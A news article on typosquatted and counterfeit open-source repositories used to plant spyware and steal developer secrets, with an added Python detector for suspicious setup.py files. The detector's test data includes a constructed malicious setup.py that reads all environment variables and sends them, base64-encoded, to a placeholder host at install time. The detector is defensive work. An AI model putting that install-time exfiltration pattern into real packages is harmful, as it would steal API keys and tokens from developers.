Long regarded as cornerstones of the open-source software world, GitHub and GitLab are now the focus of a wave of sophisticated attacks. Researchers warn that cybercriminals are planting counterfeit repositories disguised as legitimate projects. Behind the façade, these repos hide dangerous payloads that, when downloaded, deploy spyware and remote access Trojans—giving attackers unrestricted entry to victims’ devices.
In the first six months of 2025, 63% of recorded cyberattacks relied on malware, according to Positive Technologies. The firm also found that distribution via websites nearly doubled compared to 2024. Analysts warn this marks a strategic change, as cybercriminals now aim to compromise developers themselves—placing the integrity of core software code at risk.
Unmasking How Fraudulent Projects Deceive and Exploit Users
It’s a subtle but effective approach. Cybercriminals mimic popular open-source repositories and then rely on typosquatting: they publish packages whose names differ from the genuine one by a single character, a transposed pair of letters, or a missing hyphen. Because a package registry resolves a name exactly as typed, a developer who mistypes an install command, or copies the name from a look-alike repository, downloads the attacker’s malicious code instead of the real software.
Attackers in Russia, Brazil, and Turkey have already used these methods against cryptocurrency users and investors, deploying malware that steals wallet addresses, banking details, and personal data. Meanwhile, in the U.S., Europe, and Asia, the North Korean Lazarus Group compromised at least 233 victims by planting a malicious JavaScript program in developer environments to covertly collect system information.
Cyberattacks Put Global Supply Chains at Risk
According to researchers, the danger reaches far past single victims. By inserting malicious code into widely used developer resources, attackers risk triggering chain reactions across the software ecosystem. One corrupted project could put thousands of organizations in jeopardy simultaneously.
Evidence of the threat is clear. Earlier this year, attackers uploaded packages named deepseek and deepseekai to the PyPI repository, trading on the name of the DeepSeek AI model to reach machine learning specialists. Once installed, the malware exfiltrated environment variables, which routinely hold API keys, tokens, and other sensitive information, turning development environments into surveillance platforms.
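As an added example, not the actual malware and not code from the article or from Positive Technologies, the Python script below does a static triage of a setup.py for the pattern described above: install-time code that reads the process environment and opens a network connection. The two setup.py texts are constructed samples, and the package name in them is a placeholder.

```python
"""Static triage of a setup.py for install-time environment exfiltration.

Added example, not from the original article. Walks the AST of a setup.py
and reports reads of the environment (os.environ / os.getenv), imports of
networking modules, and exec/eval or base64 decoding. Environment access
combined with networking in an installer is the signature worth blocking.
"""
import ast

ENV_READS = {("os", "environ"), ("os", "getenv")}
NET_MODULES = {"socket", "urllib", "http", "requests", "ftplib"}
DYNAMIC = {"exec", "eval", "__import__"}


class SetupAuditor(ast.NodeVisitor):
    def __init__(self):
        self.findings = []  # (line, category, detail)

    def _module_hit(self, lineno, modname):
        if modname.split(".")[0] in NET_MODULES:
            self.findings.append((lineno, "network", modname))

    def visit_Import(self, node):
        for alias in node.names:
            self._module_hit(node.lineno, alias.name)
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        self._module_hit(node.lineno, node.module or "")
        self.generic_visit(node)

    def visit_Attribute(self, node):
        if isinstance(node.value, ast.Name) and (node.value.id, node.attr) in ENV_READS:
            self.findings.append((node.lineno, "env_read", f"{node.value.id}.{node.attr}"))
        self.generic_visit(node)

    def visit_Call(self, node):
        f = node.func
        if isinstance(f, ast.Name) and f.id in DYNAMIC:
            self.findings.append((node.lineno, "dynamic_exec", f.id))
        elif isinstance(f, ast.Attribute) and f.attr == "b64decode":
            self.findings.append((node.lineno, "obfuscation", "b64decode"))
        self.generic_visit(node)


def audit_setup(source: str):
    """Return ("suspicious" | "ok", sorted findings) for a setup.py source text."""
    auditor = SetupAuditor()
    auditor.visit(ast.parse(source))
    cats = {c for _, c, _ in auditor.findings}
    verdict = "suspicious" if {"env_read", "network"} <= cats else "ok"
    return verdict, sorted(auditor.findings)


# Constructed sample: an ordinary setup.py.
BENIGN = """
from setuptools import setup
setup(name="example-pkg", version="0.1", packages=["example_pkg"])
"""

# Constructed sample of the harvesting pattern (placeholder name and host).
MALICIOUS = """
import os, json, base64
from setuptools import setup
from urllib import request

def _collect():
    data = json.dumps(dict(os.environ)).encode()
    request.urlopen("https://example.invalid/c", data=base64.b64encode(data))

_collect()
setup(name="example-pkg", version="0.1")
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("malicious", MALICIOUS)):
        verdict, findings = audit_setup(src)
        print(label, verdict, findings)
```

This is a triage heuristic, not a verdict: `import os as o`, `getattr(os, "environ")`, or a string-built import slips past it. The durable controls are installing untrusted packages in a sandbox without secrets in the environment, pinning dependencies by hash, and preferring wheels, whose installation does not execute setup.py at all.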
The Rising Global Danger
What’s happening across GitHub, GitLab, and other open-source platforms illustrates a major shift in cyberwarfare tactics. Rather than relying solely on phishing or ransomware, adversaries are targeting the very foundations of how software is built.
For both IT firms and governments, the danger is twofold: compromised developer tools could open doors to critical infrastructure and simultaneously weaken trust in open-source collaboration — a cornerstone of modern innovation. Researchers warn these attacks will persist as long as platforms stay open, decentralized, and globally available. The challenge is no longer just technical but cultural: protecting the openness of coding communities while strengthening defenses. For developers worldwide — the gatekeepers of the digital era — the battleground has now moved into their repositories.